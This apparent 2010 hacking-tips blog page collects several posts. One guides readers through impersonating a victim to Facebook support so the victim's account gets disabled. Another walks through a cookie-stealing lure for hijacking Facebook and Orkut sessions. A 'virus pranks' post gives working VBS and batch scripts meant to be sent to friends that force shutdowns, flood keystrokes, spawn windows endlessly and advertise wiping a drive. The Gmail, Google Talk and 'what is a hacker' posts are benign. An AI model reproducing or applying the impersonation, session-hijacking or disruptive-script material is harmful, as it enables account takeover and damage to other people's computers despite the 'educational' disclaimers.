Ads 468x60px

Friday, December 31, 2010

How To Delete Someone Else Facebook Account

This tutorial is for education purpose only, once deleted profile can never be recovered.

This is an extreme example of Social Engineering technique, we need following things to do so.

1. Victim’s profile link ( you can get it easily )
2. His/Her Email which he/she uses to sign in
3. His/Her birth date which he/she has used in the profile
4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.

* Now you will get this screen


Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email u created.
* You will get a email on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim’s name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ‘ I am a girl and it poses threat to my social life ‘ and write anything you want that could make them take action.
* After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
* Next Day or Same Day you will get an Email that your account is disabled.

This tutorial is for education purpose only.

Wednesday, December 8, 2010

Chit Chat for Facebook Awesome apps

Hello frnds,
                  This is shashank and this post is on latest massenger for facebook

Chit Chat for Facebook

Chit Chat is a free Facebook chat instant messenger (IM) that allows you to chat with your Facebook friends from your desktop.
Chit Chat connects to Facebook and removes the need of a web-browser to talk over Facebook Chat.


Benefits of Chit Chat for Facebook

  • Fun and Free - Convenient and fun way to chat with your Facebook contacts without the hassle of surfing Facebook
  • Free Your Web-Browser - No need to keep your web browser logged into Facebook
  • Easy To Use - Download, install and then login with your Facebook username and password - easy!
  • Popular? - Swift and fast tabbed chat Interface making it easy to talk with many Facebook friends at once
  • Instant Message Notification - Lets you know when you receive an instant message.

           here is the link for download

   http://www.ziddu.com/download/12881116/CCFFacebookSetup-v1.42.exe.html

Saturday, December 4, 2010

Facebook & Orkut Hacking Tricks by JavaScript

HI frnds,

This is my first post.. so please beware with me..

Here i want to aware u with an latest hack in a facebook/orkut world.this is one of the most popular trick through more than 20,35,000 accounts are hacked.


Do you receive any message/scraps which is advertising "Phhilphing the pictures" Do you click on that link to change your Orkut theme ? Or Do you receive any message saying "Free mobile recharge" or "change your theme"? Do you click on that link ? If your answer is “yes” then you are victim of Orkut Hack Tricks.

And this is most used Facebook/Orkut Hack Tricks type known as

Java Script Hacking

or

Facebook/Orkut Hack Tricks via cookie Stealing”.




What is JavaScript :-Java Script is programming in general and scripting in particular language which is used by most of the web developers.


How its work?

Hack Tricks :

1) Login to your Facebook/orkut account. Now click on “Profile” link.
2) You will Found URL at address bar of Firefox :
3) Copy the UID shown by arrow in image and replace with ”YOURUIDHERE” in the JavaSvript.
4) Now send this link to your victim by scrap or post with words like “Free Mobile Recharge” or “Hot Shakira Video”.
Now, just check your scrapbook, when victim click on link, you will find his cookie in your scrapbook.
5) Now, Go to Tools-> Cookie Editor. and press ‘Refresh’.
6) Double Click on it replace with Victim’s cookie. And put your UID in the place of victims UID and Logout from your Facebook/Orkut account and login again.
Thats it. Now, You are in victim’s Homepage.
And, You successfully applied Java Script Hack Tricks .

And if you want the Java Script which is used in this, then post ur ID in commnet box so i mail you.And please note this java script is only for Educational purpose only.


Friday, December 3, 2010

How to undo send in gmail

Did you ever knew that you can undo a sent e-mail in Gmail? It is a lesser known feature, but Google made it even better than it was before. When it was first introduced, you were given just five seconds window during which you could hit “undo.”

Now that’s up to 30 seconds.

This feature is hidden from most of the users who don’t know where it exists. Be aware that the feature is part of Gmail Labs, though. That means it’s still in testing mode and it might not always work as intended.
Procedure:
1)login to your gmail account.
2)In your google mail page click on the green conical flask button


 

Wednesday, December 1, 2010

Top 10 virus pranks



ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

--- --- --- --- --- --- --- --- ---

1) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.

2) Convey your friend a little message and shut down his / her computer:
Type :

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it.


3) Toggle your friend's Caps Lock button simultaneously:


Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "


Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it.


8. Open Notepad continually in your friend's computer:
Type :

Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



Save it as "Anything.BAT" and send it.

10) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.




 --- --- --- --- --- --- --- --- ------ --- --- --- --- --- --- --- ------ --- --- --- --- --- --- --- ---

Mail It Or Send Via Messenger
--- --- --- --- --- --- --- --- ------ --- --- --- --- --- --- --- ------ --- --- --- --- --- --- --- ---
to get rid of it..Shutdown Your PC Or End Process
--- --- --- --- --- --- --- --- ------ --- --- --- --- --- --- --- ------ --- --- --- --- --- --- --- ---

Tuesday, November 30, 2010

Multi Google Talk Login without any use of Software

hi frnds,
           dis is shashank dis post is to hack gtalk exactly its not a hack
            its a trick of it..to multi login gtalk

Just follow the simple steps Below:
  1. Right click on the Google Talk shortcut.
  2. click on Properties.
  3. Go to Shortcut tab on Google Talk Properties window.
  4. On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex

Click on OK.

I didn't have to do anything after this and clicking on the shortcut multiple times just gave me different Google talk window.

Alternative

To create a new shortcut for Google Talk:

  1. Right-click on the desktop or anywhere you want to place the GTalk shortcut.
  2. Select New on the right click context menu.
  3. Then select Shortcut.
  4. Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex
5. Click on Next.
6. Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

Tuesday, November 2, 2010

What is Hacker??

hi frnds,,
Today post is on d topic  wch is asked by many people what d exact mean of hacker n wat is his wrk???
So , here i clerify what d exact is hacker is:

Hacker. Now here is an interesting word. Originally the term in Yiddish meant “inept furniture
maker.”Today, the term has many different meanings, both good and bad. On the good side, the hacker
is a creative individual who knows the details of computer systems and how to stretch their capabilities
to deliver speedy solutions to seemingly complex information demands. On the bad side, the
hacker—more appropriately termed a cracker—is a malicious meddler in computer systems who is
out to deface, replace, or delete data for personal gain, to sabotage a system, to get revenge, or to bring
down the economic and social well-being of a nation by attacking its highly networked critical infrastructures.



 And  basically Hackers are of 3 types i.e. WHITE, BLACK AND GREY HAT hacker.

The first one is the black hat, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, linux, a PC and an internet connection is all you need.

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime.

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers. 
Related Posts Plugin for WordPress, Blogger...
 

Sample text

Sample Text